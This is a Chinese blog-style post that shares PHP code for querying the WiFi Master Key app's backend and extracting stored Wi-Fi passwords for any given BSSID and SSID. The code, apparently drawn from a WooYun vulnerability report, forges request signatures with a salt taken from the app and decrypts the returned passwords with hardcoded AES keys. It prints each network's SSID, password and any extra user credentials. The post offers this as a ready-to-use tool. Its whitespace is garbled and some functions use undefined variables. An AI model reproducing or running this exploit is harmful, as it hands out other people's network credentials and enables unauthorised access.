WIFI万能钥匙密码查询接口实例
不废话了,直接给大家贴代码了
<?php//somecodefromhttp://www.wooyun.org/bugs/wooyun-2015-099268
$bssid="c8:3a:35:fa:b8:80";
$ssid="Podinns2F03";
if(isset($bssid)&&isset($ssid)){
//updatesalt
$ret=request($bssid,$ssid,md5(rand(1,10000)));
$ret=json_decode($ret);
$ret=request($bssid,$ssid,$ret->retSn);
$ret=json_decode($ret);
if($ret->retCd==0){
if($ret->qryapwd->retCd==0){
$list=$ret->qryapwd->psws;
foreach($listas$wifi){
echo'SSID:'.$wifi->ssid."\n";
echo'PWD:'.decryptStrin($wifi->pwd)."\n";
echo'BSSID:'.$wifi->bssid."\n";
if($wifi->xUser){
echo'xUser:'.$wifi->xUser."\n";
echo'xPwd:'.$wifi->xPwd."\n";
}
}
}
else{
echo$ret->qryapwd->retMsg;
}
}
}
functionrequest($bssid,$ssid,$salt,$dhid='ff8080814cc5798a014ccbbdfa375369'){
$data=array();
$data['appid']='0008';
$data['bssid']=$bssid;
$data['chanid']='gw';
$data['dhid']=$dhid;
$data['ii']='609537f302fc6c32907a935fb4bf7ac9';
$data['lang']='cn';
$data['mac']='60f81dad28de';
$data['method']='getDeepSecChkSwitch';
$data['pid']='qryapwd:commonswitch';
$data['ssid']=$ssid;
$data['st']='m';
$data['uhid']='a0000000000000000000000000000001';
$data['v']='324';
$data['sign']=sign($data,$salt);
$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,'http://wifiapi02.51y5.net/wifiapi/fa.cmd');
curl_setopt($curl,CURLOPT_USERAGENT,'WiFiMasterKey/1.1.0(MacOSXVersion10.10.3(Build14D136))');
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,false);//stopverifyingcertificate
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_POST,true);//enableposting
curl_setopt($curl,CURLOPT_POSTFIELDS,http_build_query($data));//postimages
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);//ifanyredirectionafterupload
$r=curl_exec($curl);
curl_close($curl);
return$r;
}
functionregisterNewDevice(){
$salt='1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3Nj#1Aa$';
$data=array();
$data['appid']='0008';
$data['bssid']=$bssid;
$data['chanid']='gw';
$data['dhid']=$dhid;
$data['ii']='609537f302fc6c32907a935fb4bf7ac9';
$data['lang']='cn';
$data['mac']='60f81dad28de';
$data['method']='getDeepSecChkSwitch';
$data['pid']='qryapwd:commonswitch';
$data['ssid']=$ssid;
$data['st']='m';
$data['uhid']='a0000000000000000000000000000001';
$data['v']='324';
$data['sign']=sign($data,$salt);
}
functionsign($array,$salt){
//签名算法
$request_str='';
//对应apk中的Arrays.sort数组排序,测试PHP需用ksort
ksort($array);
foreach($arrayas$key=>$value){
$request_str.=$value;
}
$sign=md5($request_str.$salt);
returnstrtoupper($sign);
}
functiondecryptStrin($str,$keys='k%7Ve#8Ie!5Fb&8E',$iv='y!0Oe#2Wj#6Pw!3V',$cipher_alg=MCRYPT_RIJNDAEL_128){
//Wi-Fi万能钥匙密码采用AES/CBC/NoPadding方式加密
//[length][password][timestamp]
$decrypted_string=mcrypt_decrypt($cipher_alg,$keys,pack("H*",$str),MCRYPT_MODE_CBC,$iv);
returnsubstr(trim($decrypted_string),3,-13);
}?>
以上代码很简单吗,WIFI万能钥匙密码查询接口代码就全部写完了,希望大家喜欢。